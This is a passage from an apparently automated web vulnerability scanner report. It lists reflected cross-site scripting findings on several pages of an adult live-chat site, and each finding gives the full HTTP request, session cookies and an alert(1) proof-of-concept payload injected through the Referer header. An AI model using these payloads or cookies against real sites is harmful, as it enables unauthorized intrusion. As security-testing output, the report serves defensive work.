script">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/ipodmain.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video-for-ipod/&rf=http://www.google.com/search?hl=en^q=96bee'-alert(1)-'306a0aabfe1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.216. http://imlive.com/live-sex-chats/free-sex-video/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38c58'-alert(1)-'c21d7feff7f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/free-sex-video/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=38c58'-alert(1)-'c21d7feff7f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:34 GMT
Connection: close
Content-Length: 51719
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/competitionspage.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video/&rf=http://www.google.com/search?hl=en^q=38c58'-alert(1)-'c21d7feff7f&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.217. http://imlive.com/live-sex-chats/gay-couple/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/gay-couple/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 375ba'-alert(1)-'7a67cb13099 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/gay-couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=375ba'-alert(1)-'7a67cb13099

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:05 GMT
Connection: close
Content-Length: 33567
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
pe="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay-couple/&rf=http://www.google.com/search?hl=en^q=375ba'-alert(1)-'7a67cb13099&qs=cat=1^roomid=52&qs=cat=1^roomid=52&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

2.218. http://imlive.com/live-sex-chats/gay/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/gay/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ca5e'-alert(1)-'e9dfbf1b8ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/gay/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=2ca5e'-alert(1)-'e9dfbf1b8ea

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:34 GMT
Connection: close
Content-Length: 195039
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ript type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay/&rf=http://www.google.com/search?hl=en^q=2ca5e'-alert(1)-'e9dfbf1b8ea&qs=cat=1^roomid=53&qs=cat=1^roomid=53&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

2.219. http://imlive.com/live-sex-chats/guy-alone/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/guy-alone/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ad47'-alert(1)-'76a1a657857 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/guy-alone/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=5ad47'-alert(1)-'76a1a657857

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:48 GMT
Connection: close
Content-Length: 69840
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/guy-alone/&rf=http://www.google.com/search?hl=en^q=5ad47'-alert(1)-'76a1a657857&qs=cat=1^roomid=54&qs=cat=1^roomid=54&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

2.220. http://imlive.com/live-sex-chats/happyhour/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/happyhour/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1502'-alert(1)-'6f19a081c72 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/happyhour/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=d1502'-alert(1)-'6f19a081c72

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:43 GMT
Connection: close
Content-Length: 22380
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
pe="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/happyhour.aspx&he=imlive.com&ul=/live-sex-chats/happyhour/&rf=http://www.google.com/search?hl=en^q=d1502'-alert(1)-'6f19a081c72&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.221. http://imlive.com/live-sex-chats/lesbian-couple/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian-couple/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b461'-alert(1)-'6f4815116d3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/lesbian-couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=8b461'-alert(1)-'6f4815116d3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:22 GMT
Connection: close
Content-Length: 118812
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian-couple/&rf=http://www.google.com/search?hl=en^q=8b461'-alert(1)-'6f4815116d3&qs=cat=1^roomid=191&qs=cat=1^roomid=191&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if (
...[SNIP]...

2.222. http://imlive.com/live-sex-chats/lesbian/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/lesbian/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7026c'-alert(1)-'0aae3d52806 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/lesbian/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=7026c'-alert(1)-'0aae3d52806

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:47 GMT
Connection: close
Content-Length: 32900
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian/&rf=http://www.google.com/search?hl=en^q=7026c'-alert(1)-'0aae3d52806&qs=cat=1^roomid=11&qs=cat=1^roomid=11&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

2.223. http://imlive.com/live-sex-chats/live-sex-video/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/live-sex-video/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff204'-alert(1)-'8fd9da9f013 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/live-sex-video/ HTTP/1.1
Host: imlive.com
